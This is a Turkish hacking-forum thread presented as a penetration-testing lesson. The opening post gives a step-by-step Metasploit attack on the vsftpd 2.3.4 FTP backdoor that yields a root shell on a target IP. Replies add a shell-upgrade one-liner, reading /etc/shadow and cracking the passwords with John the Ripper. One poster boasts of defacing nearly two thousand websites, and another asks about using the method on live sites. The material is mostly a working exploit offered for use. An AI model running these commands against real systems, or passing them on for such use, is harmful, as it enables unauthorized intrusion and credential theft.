1. Ayyıldız Tim forumu Hariç Hiç Bir şekilde Rütbeli Oldugunu İddaa edenlere inanmayınız..⠀ Ayyıldız Tim Adına Sizden Bilgi Belge TC Kimlik Vb Evrak İsteyenlere Asla Bilgilerinizi Vermeyiniz.

Pentester Dersi Port 21 Ftp Hackleme

'Exploitler' forumunda ArslannBey tarafından 12 Temmuz 2017 tarihinde açılan konu

  1. ArslannBey Guest

    • Guest
    Katılım:
    16 Ocak 2017
    Mesaj:
    1,218
    Alınan Beğeniler:
    2,393

    Özel Mesaj
    Bir önceki konumuz port 80 http hackleme idi.
    Şimdi ise Port 21 in açıklı versionu olan vsftpd 2.3.4 ü hackliycez.



    Saldıracağımız IP adresimiz : 192.168.222.131


    Saldırıyı Yaparken Kullanacağımız Materyaller :

    1 - Nmap

    2 - Metasploit



    PORT 21 VSFTPD

    -sS komutu ile Syn taraması yaparak tcp portlarını görüntüledim ve de -sV komutu ile remote servislerin versionlarını görüntüledim.


    Bizim Saldırı Yapacağımız Port Numarası 21 yani FTP portu


    [​IMG]


    Görüldüğü Üzere Sistemin 21.Portunda VSFTPD Versionunun 2.3.4 Sürümü Mevcut.


    Metasploiti Açalım


    Kod:
    service postgresql start
    Kod:
    service mysql start
    Kod:
    msfconsole

    Evet Açıklı Version vsftpd 2.3.4 idi

    Metasploiti Açtık Uygun Exploit Aramak İçin Şunu Yazalım.


    Kod:
    search vsftpd 2.3.4

    Ve Ardından Karşımıza Bir Exploit Geliyor Ona Şu Komutla Girelim.


    Kod:
    use exploit/unix/ftp/vsftpd_234_backdoor

    [​IMG]


    Evet Exploitimize giriş yaptık ardından show options yazarak bizden doldurmasını istediğimiz şeyleri görelim.

    [​IMG]


    Evet Görüyoruzki Oynama Yapacağımız şey RHOST ve PAYLOAD olacak.


    Kod:
    set RHOST 192.168.222.131

    Yazdım. Ve Remote Sistemin ip sini belirttim.Ardından

    Kod:
    set PAYLOAD cmd/unix/interact


    Payloadı Düzenledim.

    [​IMG]


    Ve Son Olarak Da Artık


    Kod:
    exploit


    komutunu giriyorum ve shell scriptdeyim..


    [​IMG]


    whoami komutunu yazdığımda root göstergesini aldım.

    uname -a yazarak sistemi öğrendim.

    ardından ls -la yazarak bulundugum dizindeki dosya yetkilerini ve dosyaları öğrendim....

    Önceki Konularım

    https://forum.ayyildiz.org/konu/pentester-dersi-port-80-http-hackleme.119603/

    https://forum.ayyildiz.org/konu/pentest-dersi-mysql-hackleme-metasploit.119473/







     
    Orion-Pax, THACKAY, SAZAK ve 12 kişi daha bunu beğendi.
  2. sebuhi Atıldı

    • Guest
    Katılım:
    22 Şubat 2017
    Mesaj:
    4,235
    Alınan Beğeniler:
    4,063

    Özel Mesaj
    Ellerine sağlık üst devrem.Bir sorum olacak ben 1 yıldan beri windows 10 kulanıyorum kali linux kullanmadanda windowsda hack işleri yapabilirmiyim? orta düzey çalışıyorum.Saygılarla
     
    Orion-Pax, sMrXX ve ArslannBey bunu beğendi.
  3. ArslannBey Guest

    • Guest
    Katılım:
    16 Ocak 2017
    Mesaj:
    1,218
    Alınan Beğeniler:
    2,393

    Özel Mesaj
    Tabii ki yapabilirsin çok program var ki programsızda yapabilirsin.Windowsda binden fazla ikibine yakın site indexlediğimi bilirim
     
    Orion-Pax ve sebuhi bunu beğendi.
  4. sMrXX Atıldı

    • Guest
    Katılım:
    14 Ocak 2017
    Mesaj:
    1,962
    Alınan Beğeniler:
    2,436

    Özel Mesaj
    Bir mantık BackConnect'dir yani 443 portunu dinlemek ile aynı mantıkdır.
     
    Orion-Pax bunu beğendi.
  5. ArslannBey Guest

    • Guest
    Katılım:
    16 Ocak 2017
    Mesaj:
    1,218
    Alınan Beğeniler:
    2,393

    Özel Mesaj
    bir bakıma evet ama sadece bazı yerlerde genel olarak birinin yaptıgı başlangıcı diğerinde yapamassın örnek metasploit-backconnect başlangıçları
     
    Orion-Pax bunu beğendi.
  6. ArslannBey Guest

    • Guest
    Katılım:
    16 Ocak 2017
    Mesaj:
    1,218
    Alınan Beğeniler:
    2,393

    Özel Mesaj
    aklım netcat'e gitmiş pardon :D evet buda bir backconnect
     
    Orion-Pax ve sMrXX bunu beğendi.
  7. sMrXX Atıldı

    • Guest
    Katılım:
    14 Ocak 2017
    Mesaj:
    1,962
    Alınan Beğeniler:
    2,436

    Özel Mesaj
    Dedim yöntem aynı çünkü ama amaçlar farklı birinde root oluyorsun, diğerinde port'dan hackliyorsun
     
    Orion-Pax bunu beğendi.
  8. ArslannBey Guest

    • Guest
    Katılım:
    16 Ocak 2017
    Mesaj:
    1,218
    Alınan Beğeniler:
    2,393

    Özel Mesaj
    yok ikiside aynı sv ye giriyosun direkman root olmanın imkanı yok direk root olmak ıcın local ağda bulunması lazım.fakat remote'da farklı
     
    Orion-Pax ve sMrXX bunu beğendi.
  9. sMrXX Atıldı

    • Guest
    Katılım:
    14 Ocak 2017
    Mesaj:
    1,962
    Alınan Beğeniler:
    2,436

    Özel Mesaj
    O yüzden BackConnect daha mantıklı devam etmeyelim senin konu gereksiz çıkacak .)
     
    Orion-Pax ve ArslannBey bunu beğendi.
  10. thekont Guest

    • Guest
    Katılım:
    7 Haziran 2017
    Mesaj:
    201
    Alınan Beğeniler:
    278

    Özel Mesaj
    canım komutanım elinize sağlık. o elleriniz dert görmesin.
     
    Erdem2 ve sMrXX bunu beğendi.
  11. sMrXX Atıldı

    • Guest
    Katılım:
    14 Ocak 2017
    Mesaj:
    1,962
    Alınan Beğeniler:
    2,436

    Özel Mesaj
    Konuda komutan göremedim devrem ?
     
    Orion-Pax bunu beğendi.
  12. thekont Guest

    • Guest
    Katılım:
    7 Haziran 2017
    Mesaj:
    201
    Alınan Beğeniler:
    278

    Özel Mesaj
    kusura bakmayın yanlış yere yazdım :)
     
  13. thekont Guest

    • Guest
    Katılım:
    7 Haziran 2017
    Mesaj:
    201
    Alınan Beğeniler:
    278

    Özel Mesaj
    devrem eline sağlık.
     
    Orion-Pax ve ArslannBey bunu beğendi.
  14. ArslannBey Guest

    • Guest
    Katılım:
    16 Ocak 2017
    Mesaj:
    1,218
    Alınan Beğeniler:
    2,393

    Özel Mesaj
    sağolasın
     
    Orion-Pax ve thekont bunu beğendi.
  15. BabaFingo Guest

    • Guest
    Katılım:
    13 Temmuz 2017
    Mesaj:
    3
    Alınan Beğeniler:
    1

    Özel Mesaj
    Devrem ellerine sağlık.Devamında

    python -c 'import pty; pty.spawn("/bin/sh")'

    bu kodu yazarak etkileşimli shell alabilirsiniz.Aldıktan sonrada zaten sudo su yazarak root oluyorsunuz. Diğer kullanıcıların parolalarınıda john the ripper ile kırabilirsiniz.

    diger kullanıcıların parolalarını cat /etc/shadow da bulabilirsiniz.
     
    Orion-Pax bunu beğendi.
  16. GolemTR12 Guest

    • Guest
    Katılım:
    3 Nisan 2017
    Mesaj:
    376
    Alınan Beğeniler:
    279

    Özel Mesaj
    Güzel konu eline sağlık
     
    Orion-Pax bunu beğendi.
  17. ArslannBey Guest

    • Guest
    Katılım:
    16 Ocak 2017
    Mesaj:
    1,218
    Alınan Beğeniler:
    2,393

    Özel Mesaj
    sağolun
     
    Orion-Pax bunu beğendi.
  18. ERVAH-I-EZEL Guest

    • Guest
    Katılım:
    30 Ocak 2017
    Mesaj:
    1,333
    Alınan Beğeniler:
    4,879

    Özel Mesaj
     
    Orion-Pax ve ArslannBey bunu beğendi.
  19. ArslannBey Guest

    • Guest
    Katılım:
    16 Ocak 2017
    Mesaj:
    1,218
    Alınan Beğeniler:
    2,393

    Özel Mesaj
    Orion-Pax ve ERVAH-I-EZEL bunu beğendi.
  20. Kullanicioo1 Guest

    • Guest
    Katılım:
    5 Eylül 2017
    Mesaj:
    43
    Alınan Beğeniler:
    11

    Özel Mesaj
    Bu 21 port acik olan siteler icinde gecerlimi?
     
    Orion-Pax bunu beğendi.

Bu Sayfayı Paylaş